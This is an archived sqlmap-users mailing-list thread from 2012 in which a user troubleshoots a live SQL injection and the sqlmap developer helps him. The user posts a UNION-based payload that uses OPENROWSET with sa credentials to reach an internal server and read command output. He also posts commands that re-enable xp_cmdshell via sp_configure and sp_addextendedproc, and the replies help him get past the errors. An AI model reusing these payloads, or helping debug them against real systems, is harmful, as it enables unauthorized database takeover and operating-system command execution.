Re: [sqlmap-users] error with ms sql
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] error with ms sql
|
From: Adi M. <adi...@ya...> - 2012-06-21 08:45:37
|
tried, same stuff. I've tried to reenable xp_cmdshell first with master..sp_configure 'show advanced options',1 reconfigure master..sp_configure 'xp_cmdshell',1 reconfigure and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.] then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' and got error: OLE DB error trace [Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. ________________________________ From: Miroslav Stampar <mir...@gm...> To: Adi Mutu <adi...@ya...> Cc: "sql...@li..." <sql...@li...> Sent: Thursday, June 21, 2012 11:26 AM Subject: Re: [sqlmap-users] error with ms sql try with master..resultabcd i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: Hi Miroslav, > > >got db_name master and tried with master.resultabcd but i get the same error. > > >Kind Regards, >A. > > > >________________________________ > From: Miroslav Stampar <mir...@gm...> >To: Adi Mutu <adi...@ya...> >Cc: "sql...@li..." <sql...@li...> >Sent: Thursday, June 21, 2012 11:11 AM >Subject: Re: [sqlmap-users] error with ms sql > > > >Hi Adi. > > >You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466) > > >Kind regards, >Miroslav Stampar > > >On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > >I'm having an injection like this: >>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4) >> >> >>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 >> >> >> >>and when I try to select form resultabcd i get: >>[OLE/DB provider returned message: Deferred prepare could not be completed.] >> >> >> >>could not find a good answer with google. Thanks. >> >> >>Kind regards, >>A. >>------------------------------------------------------------------------------ >>Live Security Virtual Conference >>Exclusive live event will cover all the ways today's security and >>threat landscape has changed and how IT managers can respond. Discussions >>will include endpoint security, mobile security and the latest in malware >>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>_______________________________________________ >>sqlmap-users mailing list >>sql...@li... >>https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > >-- >Miroslav Stampar >http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm |
